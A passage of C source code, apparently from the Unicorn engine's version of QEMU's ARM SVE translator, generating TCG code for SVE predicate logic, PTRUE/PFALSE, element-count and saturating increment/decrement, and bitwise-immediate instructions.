if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_3_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), vsz, vsz, a->imm, fn); } return true; } static bool trans_ADR_p32(DisasContext *s, arg_rrri *a) { return do_adr(s, a, gen_helper_sve_adr_p32); } static bool trans_ADR_p64(DisasContext *s, arg_rrri *a) { return do_adr(s, a, gen_helper_sve_adr_p64); } static bool trans_ADR_s32(DisasContext *s, arg_rrri *a) { return do_adr(s, a, gen_helper_sve_adr_s32); } static bool trans_ADR_u32(DisasContext *s, arg_rrri *a) { return do_adr(s, a, gen_helper_sve_adr_u32); } /* *** SVE Integer Misc - Unpredicated Group */ static bool trans_FEXPA(DisasContext *s, arg_rr_esz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_2 * const fns[4] = { NULL, gen_helper_sve_fexpa_h, gen_helper_sve_fexpa_s, gen_helper_sve_fexpa_d, }; if (a->esz == 0) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_2_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vsz, vsz, 0, fns[a->esz]); } return true; } static bool trans_FTSSEL(DisasContext *s, arg_rrr_esz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_3 * const fns[4] = { NULL, gen_helper_sve_ftssel_h, gen_helper_sve_ftssel_s, gen_helper_sve_ftssel_d, }; if (a->esz == 0) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_3_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), 
vec_full_reg_offset(s, a->rm), vsz, vsz, 0, fns[a->esz]); } return true; } /* *** SVE Predicate Logical Operations Group */ static bool do_pppp_flags(DisasContext *s, arg_rprr_s *a, const GVecGen4 *gvec_op) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!sve_access_check(s)) { return true; } unsigned psz = pred_gvec_reg_size(s); int dofs = pred_full_reg_offset(s, a->rd); int nofs = pred_full_reg_offset(s, a->rn); int mofs = pred_full_reg_offset(s, a->rm); int gofs = pred_full_reg_offset(s, a->pg); if (psz == 8) { /* Do the operation and the flags generation in temps. */ TCGv_i64 pd = tcg_temp_new_i64(tcg_ctx); TCGv_i64 pn = tcg_temp_new_i64(tcg_ctx); TCGv_i64 pm = tcg_temp_new_i64(tcg_ctx); TCGv_i64 pg = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, pn, tcg_ctx->cpu_env, nofs); tcg_gen_ld_i64(tcg_ctx, pm, tcg_ctx->cpu_env, mofs); tcg_gen_ld_i64(tcg_ctx, pg, tcg_ctx->cpu_env, gofs); gvec_op->fni8(tcg_ctx, pd, pn, pm, pg); tcg_gen_st_i64(tcg_ctx, pd, tcg_ctx->cpu_env, dofs); do_predtest1(tcg_ctx, pd, pg); tcg_temp_free_i64(tcg_ctx, pd); tcg_temp_free_i64(tcg_ctx, pn); tcg_temp_free_i64(tcg_ctx, pm); tcg_temp_free_i64(tcg_ctx, pg); } else { /* The operation and flags generation is large. The computation * of the flags depends on the original contents of the guarding * predicate. If the destination overwrites the guarding predicate, * then the easiest way to get this right is to save a copy. */ int tofs = gofs; if (a->rd == a->pg) { tofs = offsetof(CPUARMState, vfp.preg_tmp); tcg_gen_gvec_mov(tcg_ctx, 0, tofs, gofs, psz, psz); } tcg_gen_gvec_4(tcg_ctx, dofs, nofs, mofs, gofs, psz, psz, gvec_op); do_predtest(s, dofs, tofs, psz / 8); } return true; } static void gen_and_pg_i64(TCGContext *tcg_ctx, TCGv_i64 pd, TCGv_i64 pn, TCGv_i64 pm, TCGv_i64 pg) { tcg_gen_and_i64(tcg_ctx, pd, pn, pm); tcg_gen_and_i64(tcg_ctx, pd, pd, pg); } static void gen_and_pg_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec pd, TCGv_vec pn, TCGv_vec pm, TCGv_vec pg) { tcg_gen_and_vec(tcg_ctx, vece, pd, pn, pm); tcg_gen_and_vec(tcg_ctx, vece, pd, pd, pg); } static bool trans_AND_pppp(DisasContext *s, arg_rprr_s *a) { static const GVecGen4 op = { .fni8 = gen_and_pg_i64, .fniv = gen_and_pg_vec, .fno = gen_helper_sve_and_pppp, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (a->s) { return do_pppp_flags(s, a, &op); } else if (a->rn == a->rm) { if (a->pg == a->rn) { return do_mov_p(s, a->rd, a->rn); } else { return do_vector3_p(s, tcg_gen_gvec_and, 0, a->rd, a->rn, a->pg); } } else if (a->pg == a->rn || a->pg == a->rm) { return do_vector3_p(s, tcg_gen_gvec_and, 0, a->rd, a->rn, a->rm); } else { return do_vecop4_p(s, &op, a->rd, a->rn, a->rm, a->pg); } } static void gen_bic_pg_i64(TCGContext *tcg_ctx, TCGv_i64 pd, TCGv_i64 pn, TCGv_i64 pm, TCGv_i64 pg) { tcg_gen_andc_i64(tcg_ctx, pd, pn, pm); tcg_gen_and_i64(tcg_ctx, pd, pd, pg); } static void gen_bic_pg_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec pd, TCGv_vec pn, TCGv_vec pm, TCGv_vec pg) { tcg_gen_andc_vec(tcg_ctx, vece, pd, pn, pm); tcg_gen_and_vec(tcg_ctx, vece, pd, pd, pg); } static bool trans_BIC_pppp(DisasContext *s, arg_rprr_s *a) { static const GVecGen4 op = { .fni8 = gen_bic_pg_i64, .fniv = gen_bic_pg_vec, .fno = gen_helper_sve_bic_pppp, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (a->s) { return do_pppp_flags(s, a, &op); } else if (a->pg == a->rn) { return do_vector3_p(s, tcg_gen_gvec_andc, 0, a->rd, a->rn, a->rm); } else { return do_vecop4_p(s, &op, a->rd, a->rn, a->rm, a->pg); } } static void gen_eor_pg_i64(TCGContext *tcg_ctx, TCGv_i64 pd, TCGv_i64 pn, 
TCGv_i64 pm, TCGv_i64 pg) { tcg_gen_xor_i64(tcg_ctx, pd, pn, pm); tcg_gen_and_i64(tcg_ctx, pd, pd, pg); } static void gen_eor_pg_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec pd, TCGv_vec pn, TCGv_vec pm, TCGv_vec pg) { tcg_gen_xor_vec(tcg_ctx, vece, pd, pn, pm); tcg_gen_and_vec(tcg_ctx, vece, pd, pd, pg); } static bool trans_EOR_pppp(DisasContext *s, arg_rprr_s *a) { static const GVecGen4 op = { .fni8 = gen_eor_pg_i64, .fniv = gen_eor_pg_vec, .fno = gen_helper_sve_eor_pppp, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (a->s) { return do_pppp_flags(s, a, &op); } else { return do_vecop4_p(s, &op, a->rd, a->rn, a->rm, a->pg); } } static void gen_sel_pg_i64(TCGContext *tcg_ctx, TCGv_i64 pd, TCGv_i64 pn, TCGv_i64 pm, TCGv_i64 pg) { tcg_gen_and_i64(tcg_ctx, pn, pn, pg); tcg_gen_andc_i64(tcg_ctx, pm, pm, pg); tcg_gen_or_i64(tcg_ctx, pd, pn, pm); } static void gen_sel_pg_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec pd, TCGv_vec pn, TCGv_vec pm, TCGv_vec pg) { tcg_gen_and_vec(tcg_ctx, vece, pn, pn, pg); tcg_gen_andc_vec(tcg_ctx, vece, pm, pm, pg); tcg_gen_or_vec(tcg_ctx, vece, pd, pn, pm); } static bool trans_SEL_pppp(DisasContext *s, arg_rprr_s *a) { static const GVecGen4 op = { .fni8 = gen_sel_pg_i64, .fniv = gen_sel_pg_vec, .fno = gen_helper_sve_sel_pppp, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (a->s) { return false; } else { return do_vecop4_p(s, &op, a->rd, a->rn, a->rm, a->pg); } } static void gen_orr_pg_i64(TCGContext *tcg_ctx, TCGv_i64 pd, TCGv_i64 pn, TCGv_i64 pm, TCGv_i64 pg) { tcg_gen_or_i64(tcg_ctx, pd, pn, pm); tcg_gen_and_i64(tcg_ctx, pd, pd, pg); } static void gen_orr_pg_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec pd, TCGv_vec pn, TCGv_vec pm, TCGv_vec pg) { tcg_gen_or_vec(tcg_ctx, vece, pd, pn, pm); tcg_gen_and_vec(tcg_ctx, vece, pd, pd, pg); } static bool trans_ORR_pppp(DisasContext *s, arg_rprr_s *a) { static const GVecGen4 op = { .fni8 = gen_orr_pg_i64, .fniv = gen_orr_pg_vec, .fno = gen_helper_sve_orr_pppp, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (a->s) { return do_pppp_flags(s, a, &op); } else if (a->pg == a->rn && a->rn == a->rm) { return do_mov_p(s, a->rd, a->rn); } else { return do_vecop4_p(s, &op, a->rd, a->rn, a->rm, a->pg); } } static void gen_orn_pg_i64(TCGContext *tcg_ctx, TCGv_i64 pd, TCGv_i64 pn, TCGv_i64 pm, TCGv_i64 pg) { tcg_gen_orc_i64(tcg_ctx, pd, pn, pm); tcg_gen_and_i64(tcg_ctx, pd, pd, pg); } static void gen_orn_pg_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec pd, TCGv_vec pn, TCGv_vec pm, TCGv_vec pg) { tcg_gen_orc_vec(tcg_ctx, vece, pd, pn, pm); tcg_gen_and_vec(tcg_ctx, vece, pd, pd, pg); } static bool trans_ORN_pppp(DisasContext *s, arg_rprr_s *a) { static const GVecGen4 op = { .fni8 = gen_orn_pg_i64, .fniv = gen_orn_pg_vec, .fno = gen_helper_sve_orn_pppp, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (a->s) { return do_pppp_flags(s, a, &op); } else { return do_vecop4_p(s, &op, a->rd, a->rn, a->rm, a->pg); } } static void gen_nor_pg_i64(TCGContext *tcg_ctx, TCGv_i64 pd, TCGv_i64 pn, TCGv_i64 pm, TCGv_i64 pg) { tcg_gen_or_i64(tcg_ctx, pd, pn, pm); tcg_gen_andc_i64(tcg_ctx, pd, pg, pd); } static void gen_nor_pg_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec pd, TCGv_vec pn, TCGv_vec pm, TCGv_vec pg) { tcg_gen_or_vec(tcg_ctx, vece, pd, pn, pm); tcg_gen_andc_vec(tcg_ctx, vece, pd, pg, pd); } static bool trans_NOR_pppp(DisasContext *s, arg_rprr_s *a) { static const GVecGen4 op = { .fni8 = gen_nor_pg_i64, .fniv = gen_nor_pg_vec, .fno = gen_helper_sve_nor_pppp, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (a->s) { return 
do_pppp_flags(s, a, &op); } else { return do_vecop4_p(s, &op, a->rd, a->rn, a->rm, a->pg); } } static void gen_nand_pg_i64(TCGContext *tcg_ctx, TCGv_i64 pd, TCGv_i64 pn, TCGv_i64 pm, TCGv_i64 pg) { tcg_gen_and_i64(tcg_ctx, pd, pn, pm); tcg_gen_andc_i64(tcg_ctx, pd, pg, pd); } static void gen_nand_pg_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec pd, TCGv_vec pn, TCGv_vec pm, TCGv_vec pg) { tcg_gen_and_vec(tcg_ctx, vece, pd, pn, pm); tcg_gen_andc_vec(tcg_ctx, vece, pd, pg, pd); } static bool trans_NAND_pppp(DisasContext *s, arg_rprr_s *a) { static const GVecGen4 op = { .fni8 = gen_nand_pg_i64, .fniv = gen_nand_pg_vec, .fno = gen_helper_sve_nand_pppp, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (a->s) { return do_pppp_flags(s, a, &op); } else { return do_vecop4_p(s, &op, a->rd, a->rn, a->rm, a->pg); } } /* *** SVE Predicate Misc Group */ static bool trans_PTEST(DisasContext *s, arg_PTEST *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { int nofs = pred_full_reg_offset(s, a->rn); int gofs = pred_full_reg_offset(s, a->pg); int words = DIV_ROUND_UP(pred_full_reg_size(s), 8); if (words == 1) { TCGv_i64 pn = tcg_temp_new_i64(tcg_ctx); TCGv_i64 pg = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, pn, tcg_ctx->cpu_env, nofs); tcg_gen_ld_i64(tcg_ctx, pg, tcg_ctx->cpu_env, gofs); do_predtest1(tcg_ctx, pn, pg); tcg_temp_free_i64(tcg_ctx, pn); tcg_temp_free_i64(tcg_ctx, pg); } else { do_predtest(s, nofs, gofs, words); } } return true; } /* See the ARM pseudocode DecodePredCount. */ static unsigned decode_pred_count(unsigned fullsz, int pattern, int esz) { unsigned elements = fullsz >> esz; unsigned bound; switch (pattern) { case 0x0: /* POW2 */ return pow2floor(elements); case 0x1: /* VL1 */ case 0x2: /* VL2 */ case 0x3: /* VL3 */ case 0x4: /* VL4 */ case 0x5: /* VL5 */ case 0x6: /* VL6 */ case 0x7: /* VL7 */ case 0x8: /* VL8 */ bound = pattern; break; case 0x9: /* VL16 */ case 0xa: /* VL32 */ case 0xb: /* VL64 */ case 0xc: /* VL128 */ case 0xd: /* VL256 */ bound = 16 << (pattern - 9); break; case 0x1d: /* MUL4 */ return elements - elements % 4; case 0x1e: /* MUL3 */ return elements - elements % 3; case 0x1f: /* ALL */ return elements; default: /* #uimm5 */ return 0; } return elements >= bound ? bound : 0; } /* This handles all of the predicate initialization instructions, * PTRUE, PFALSE, SETFFR. For PFALSE, we will have set PAT == 32 * so that decode_pred_count returns 0. For SETFFR, we will have * set RD == 16 == FFR. */ static bool do_predset(DisasContext *s, int esz, int rd, int pat, bool setflag) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!sve_access_check(s)) { return true; } unsigned fullsz = vec_full_reg_size(s); unsigned ofs = pred_full_reg_offset(s, rd); unsigned numelem, setsz, i; uint64_t word, lastword; TCGv_i64 t; numelem = decode_pred_count(fullsz, pat, esz); /* Determine what we must store into each bit, and how many. 
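 * pred_esz_masks[esz] has one predicate bit set per element; e.g. for
 * esz == 1 (16-bit elements) it is 0x5555...5555, one bit per two bytes.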
*/ if (numelem == 0) { lastword = word = 0; setsz = fullsz; } else { setsz = numelem << esz; lastword = word = pred_esz_masks[esz]; if (setsz % 64) { lastword &= MAKE_64BIT_MASK(0, setsz % 64); } } t = tcg_temp_new_i64(tcg_ctx); if (fullsz <= 64) { tcg_gen_movi_i64(tcg_ctx, t, lastword); tcg_gen_st_i64(tcg_ctx, t, tcg_ctx->cpu_env, ofs); goto done; } if (word == lastword) { unsigned maxsz = size_for_gvec(fullsz / 8); unsigned oprsz = size_for_gvec(setsz / 8); if (oprsz * 8 == setsz) { tcg_gen_gvec_dup64i(tcg_ctx, ofs, oprsz, maxsz, word); goto done; } } setsz /= 8; fullsz /= 8; tcg_gen_movi_i64(tcg_ctx, t, word); for (i = 0; i < QEMU_ALIGN_DOWN(setsz, 8); i += 8) { tcg_gen_st_i64(tcg_ctx, t, tcg_ctx->cpu_env, ofs + i); } if (lastword != word) { tcg_gen_movi_i64(tcg_ctx, t, lastword); tcg_gen_st_i64(tcg_ctx, t, tcg_ctx->cpu_env, ofs + i); i += 8; } if (i < fullsz) { tcg_gen_movi_i64(tcg_ctx, t, 0); for (; i < fullsz; i += 8) { tcg_gen_st_i64(tcg_ctx, t, tcg_ctx->cpu_env, ofs + i); } } done: tcg_temp_free_i64(tcg_ctx, t); /* PTRUES */ if (setflag) { tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_NF, -(word != 0)); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_CF, word == 0); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_VF, 0); tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); } return true; } static bool trans_PTRUE(DisasContext *s, arg_PTRUE *a) { return do_predset(s, a->esz, a->rd, a->pat, a->s); } static bool trans_SETFFR(DisasContext *s, arg_SETFFR *a) { /* Note pat == 31 is #all, to set all elements. */ return do_predset(s, 0, FFR_PRED_NUM, 31, false); } static bool trans_PFALSE(DisasContext *s, arg_PFALSE *a) { /* Note pat == 32 is #unimp, to set no elements. */ return do_predset(s, 0, a->rd, 32, false); } static bool trans_RDFFR_p(DisasContext *s, arg_RDFFR_p *a) { /* The path through do_pppp_flags is complicated enough to want to avoid * duplication. Frob the arguments into the form of a predicated AND. */ arg_rprr_s alt_a = { .rd = a->rd, .pg = a->pg, .s = a->s, .rn = FFR_PRED_NUM, .rm = FFR_PRED_NUM, }; return trans_AND_pppp(s, &alt_a); } static bool trans_RDFFR(DisasContext *s, arg_RDFFR *a) { return do_mov_p(s, a->rd, FFR_PRED_NUM); } static bool trans_WRFFR(DisasContext *s, arg_WRFFR *a) { return do_mov_p(s, FFR_PRED_NUM, a->rn); } static bool do_pfirst_pnext(DisasContext *s, arg_rr_esz *a, void (*gen_fn)(TCGContext *, TCGv_i32, TCGv_ptr, TCGv_ptr, TCGv_i32)) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!sve_access_check(s)) { return true; } TCGv_ptr t_pd = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr t_pg = tcg_temp_new_ptr(tcg_ctx); TCGv_i32 t; unsigned desc; desc = DIV_ROUND_UP(pred_full_reg_size(s), 8); desc = deposit32(desc, SIMD_DATA_SHIFT, 2, a->esz); tcg_gen_addi_ptr(tcg_ctx, t_pd, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rd)); tcg_gen_addi_ptr(tcg_ctx, t_pg, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rn)); t = tcg_const_i32(tcg_ctx, desc); gen_fn(tcg_ctx, t, t_pd, t_pg, t); tcg_temp_free_ptr(tcg_ctx, t_pd); tcg_temp_free_ptr(tcg_ctx, t_pg); do_pred_flags(tcg_ctx, t); tcg_temp_free_i32(tcg_ctx, t); return true; } static bool trans_PFIRST(DisasContext *s, arg_rr_esz *a) { return do_pfirst_pnext(s, a, gen_helper_sve_pfirst); } static bool trans_PNEXT(DisasContext *s, arg_rr_esz *a) { return do_pfirst_pnext(s, a, gen_helper_sve_pnext); } /* *** SVE Element Count Group */ /* Perform an inline saturating addition of a 32-bit value within * a 64-bit register. The second operand is known to be positive, * which halves the comparisons we must perform to bound the result.
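 * E.g. an unsigned decrement only needs the lower bound 0 (TCG_COND_LT
 * below), and an unsigned increment only the upper bound UINT32_MAX
 * (TCG_COND_GT).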
*/ static void do_sat_addsub_32(TCGContext *tcg_ctx, TCGv_i64 reg, TCGv_i64 val, bool u, bool d) { int64_t ibound; TCGv_i64 bound; TCGCond cond; /* Use normal 64-bit arithmetic to detect 32-bit overflow. */ if (u) { tcg_gen_ext32u_i64(tcg_ctx, reg, reg); } else { tcg_gen_ext32s_i64(tcg_ctx, reg, reg); } if (d) { tcg_gen_sub_i64(tcg_ctx, reg, reg, val); ibound = (u ? 0 : INT32_MIN); cond = TCG_COND_LT; } else { tcg_gen_add_i64(tcg_ctx, reg, reg, val); ibound = (u ? UINT32_MAX : INT32_MAX); cond = TCG_COND_GT; } bound = tcg_const_i64(tcg_ctx, ibound); tcg_gen_movcond_i64(tcg_ctx, cond, reg, reg, bound, bound, reg); tcg_temp_free_i64(tcg_ctx, bound); } /* Similarly with 64-bit values. */ static void do_sat_addsub_64(TCGContext *tcg_ctx, TCGv_i64 reg, TCGv_i64 val, bool u, bool d) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2; if (u) { if (d) { tcg_gen_sub_i64(tcg_ctx, t0, reg, val); tcg_gen_movi_i64(tcg_ctx, t1, 0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LTU, reg, reg, val, t1, t0); } else { tcg_gen_add_i64(tcg_ctx, t0, reg, val); tcg_gen_movi_i64(tcg_ctx, t1, -1); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LTU, reg, t0, reg, t1, t0); } } else { if (d) { /* Detect signed overflow for subtraction. */ tcg_gen_xor_i64(tcg_ctx, t0, reg, val); tcg_gen_sub_i64(tcg_ctx, t1, reg, val); tcg_gen_xor_i64(tcg_ctx, reg, reg, t1); tcg_gen_and_i64(tcg_ctx, t0, t0, reg); /* Bound the result. */ tcg_gen_movi_i64(tcg_ctx, reg, INT64_MIN); t2 = tcg_const_i64(tcg_ctx, 0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LT, reg, t0, t2, reg, t1); } else { /* Detect signed overflow for addition. */ tcg_gen_xor_i64(tcg_ctx, t0, reg, val); tcg_gen_add_i64(tcg_ctx, reg, reg, val); tcg_gen_xor_i64(tcg_ctx, t1, reg, val); tcg_gen_andc_i64(tcg_ctx, t0, t1, t0); /* Bound the result. */ tcg_gen_movi_i64(tcg_ctx, t1, INT64_MAX); t2 = tcg_const_i64(tcg_ctx, 0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LT, reg, t0, t2, t1, reg); } tcg_temp_free_i64(tcg_ctx, t2); } tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } /* Similarly with a vector and a scalar operand. 
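 * The work is done out of line: the scalar is truncated to 32 bits for
 * MO_8/MO_16, and a decrement is implemented by negating the operand and
 * reusing the saturating-add helper (except unsigned 64-bit, which has a
 * dedicated uqsubi helper).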
*/ static void do_sat_addsub_vec(DisasContext *s, int esz, int rd, int rn, TCGv_i64 val, bool u, bool d) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned vsz = vec_full_reg_size(s); TCGv_ptr dptr, nptr; TCGv_i32 t32, desc; TCGv_i64 t64; dptr = tcg_temp_new_ptr(tcg_ctx); nptr = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, dptr, tcg_ctx->cpu_env, vec_full_reg_offset(s, rd)); tcg_gen_addi_ptr(tcg_ctx, nptr, tcg_ctx->cpu_env, vec_full_reg_offset(s, rn)); desc = tcg_const_i32(tcg_ctx, simd_desc(vsz, vsz, 0)); switch (esz) { case MO_8: t32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, t32, val); if (d) { tcg_gen_neg_i32(tcg_ctx, t32, t32); } if (u) { gen_helper_sve_uqaddi_b(tcg_ctx, dptr, nptr, t32, desc); } else { gen_helper_sve_sqaddi_b(tcg_ctx, dptr, nptr, t32, desc); } tcg_temp_free_i32(tcg_ctx, t32); break; case MO_16: t32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, t32, val); if (d) { tcg_gen_neg_i32(tcg_ctx, t32, t32); } if (u) { gen_helper_sve_uqaddi_h(tcg_ctx, dptr, nptr, t32, desc); } else { gen_helper_sve_sqaddi_h(tcg_ctx, dptr, nptr, t32, desc); } tcg_temp_free_i32(tcg_ctx, t32); break; case MO_32: t64 = tcg_temp_new_i64(tcg_ctx); if (d) { tcg_gen_neg_i64(tcg_ctx, t64, val); } else { tcg_gen_mov_i64(tcg_ctx, t64, val); } if (u) { gen_helper_sve_uqaddi_s(tcg_ctx, dptr, nptr, t64, desc); } else { gen_helper_sve_sqaddi_s(tcg_ctx, dptr, nptr, t64, desc); } tcg_temp_free_i64(tcg_ctx, t64); break; case MO_64: if (u) { if (d) { gen_helper_sve_uqsubi_d(tcg_ctx, dptr, nptr, val, desc); } else { gen_helper_sve_uqaddi_d(tcg_ctx, dptr, nptr, val, desc); } } else if (d) { t64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_neg_i64(tcg_ctx, t64, val); gen_helper_sve_sqaddi_d(tcg_ctx, dptr, nptr, t64, desc); tcg_temp_free_i64(tcg_ctx, t64); } else { gen_helper_sve_sqaddi_d(tcg_ctx, dptr, nptr, val, desc); } break; default: g_assert_not_reached(); } tcg_temp_free_ptr(tcg_ctx, dptr); tcg_temp_free_ptr(tcg_ctx, nptr); tcg_temp_free_i32(tcg_ctx, desc); } static bool trans_CNT_r(DisasContext *s, arg_CNT_r *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned fullsz = vec_full_reg_size(s); unsigned numelem = decode_pred_count(fullsz, a->pat, a->esz); tcg_gen_movi_i64(tcg_ctx, cpu_reg(s, a->rd), numelem * a->imm); } return true; } static bool trans_INCDEC_r(DisasContext *s, arg_incdec_cnt *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned fullsz = vec_full_reg_size(s); unsigned numelem = decode_pred_count(fullsz, a->pat, a->esz); int inc = numelem * a->imm * (a->d ? -1 : 1); TCGv_i64 reg = cpu_reg(s, a->rd); tcg_gen_addi_i64(tcg_ctx, reg, reg, inc); } return true; } static bool trans_SINCDEC_r_32(DisasContext *s, arg_incdec_cnt *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!sve_access_check(s)) { return true; } unsigned fullsz = vec_full_reg_size(s); unsigned numelem = decode_pred_count(fullsz, a->pat, a->esz); int inc = numelem * a->imm; TCGv_i64 reg = cpu_reg(s, a->rd); /* Use normal 64-bit arithmetic to detect 32-bit overflow. 
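 * When inc == 0 there is nothing to saturate; the register is merely
 * sign- or zero-extended.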
*/ if (inc == 0) { if (a->u) { tcg_gen_ext32u_i64(tcg_ctx, reg, reg); } else { tcg_gen_ext32s_i64(tcg_ctx, reg, reg); } } else { TCGv_i64 t = tcg_const_i64(tcg_ctx, inc); do_sat_addsub_32(tcg_ctx, reg, t, a->u, a->d); tcg_temp_free_i64(tcg_ctx, t); } return true; } static bool trans_SINCDEC_r_64(DisasContext *s, arg_incdec_cnt *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!sve_access_check(s)) { return true; } unsigned fullsz = vec_full_reg_size(s); unsigned numelem = decode_pred_count(fullsz, a->pat, a->esz); int inc = numelem * a->imm; TCGv_i64 reg = cpu_reg(s, a->rd); if (inc != 0) { TCGv_i64 t = tcg_const_i64(tcg_ctx, inc); do_sat_addsub_64(tcg_ctx, reg, t, a->u, a->d); tcg_temp_free_i64(tcg_ctx, t); } return true; } static bool trans_INCDEC_v(DisasContext *s, arg_incdec2_cnt *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->esz == 0) { return false; } unsigned fullsz = vec_full_reg_size(s); unsigned numelem = decode_pred_count(fullsz, a->pat, a->esz); int inc = numelem * a->imm; if (inc != 0) { if (sve_access_check(s)) { TCGv_i64 t = tcg_const_i64(tcg_ctx, a->d ? -inc : inc); tcg_gen_gvec_adds(tcg_ctx, a->esz, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), t, fullsz, fullsz); tcg_temp_free_i64(tcg_ctx, t); } } else { do_mov_z(s, a->rd, a->rn); } return true; } static bool trans_SINCDEC_v(DisasContext *s, arg_incdec2_cnt *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->esz == 0) { return false; } unsigned fullsz = vec_full_reg_size(s); unsigned numelem = decode_pred_count(fullsz, a->pat, a->esz); int inc = numelem * a->imm; if (inc != 0) { if (sve_access_check(s)) { TCGv_i64 t = tcg_const_i64(tcg_ctx, inc); do_sat_addsub_vec(s, a->esz, a->rd, a->rn, t, a->u, a->d); tcg_temp_free_i64(tcg_ctx, t); } } else { do_mov_z(s, a->rd, a->rn); } return true; } /* *** SVE Bitwise Immediate Group */ static bool do_zz_dbm(DisasContext *s, arg_rr_dbm *a, GVecGen2iFn *gvec_fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint64_t imm; if (!logic_imm_decode_wmask(&imm, extract32(a->dbm, 12, 1), extract32(a->dbm, 0, 6), extract32(a->dbm, 6, 6))) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); gvec_fn(tcg_ctx, MO_64, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), imm, vsz, vsz); } return true; } static bool trans_AND_zzi(DisasContext *s, arg_rr_dbm *a) { return do_zz_dbm(s, a, tcg_gen_gvec_andi); } static bool trans_ORR_zzi(DisasContext *s, arg_rr_dbm *a) { return do_zz_dbm(s, a, tcg_gen_gvec_ori); } static bool trans_EOR_zzi(DisasContext *s, arg_rr_dbm *a) { return do_zz_dbm(s, a, tcg_gen_gvec_xori); } static bool trans_DUPM(DisasContext *s, arg_DUPM *a) { uint64_t imm; if (!logic_imm_decode_wmask(&imm, extract32(a->dbm, 12, 1), extract32(a->dbm, 0, 6), extract32(a->dbm, 6, 6))) { return false; } if (sve_access_check(s)) { do_dupi_z(s, a->rd, imm); } return true; } /* *** SVE Integer Wide Immediate - Predicated Group */ /* Implement all merging copies. This is used for CPY (immediate), * FCPY, CPY (scalar), CPY (SIMD&FP scalar). 
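 * Active elements of Zd are set to VAL; inactive elements keep their
 * prior contents (a merging, not zeroing, copy).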
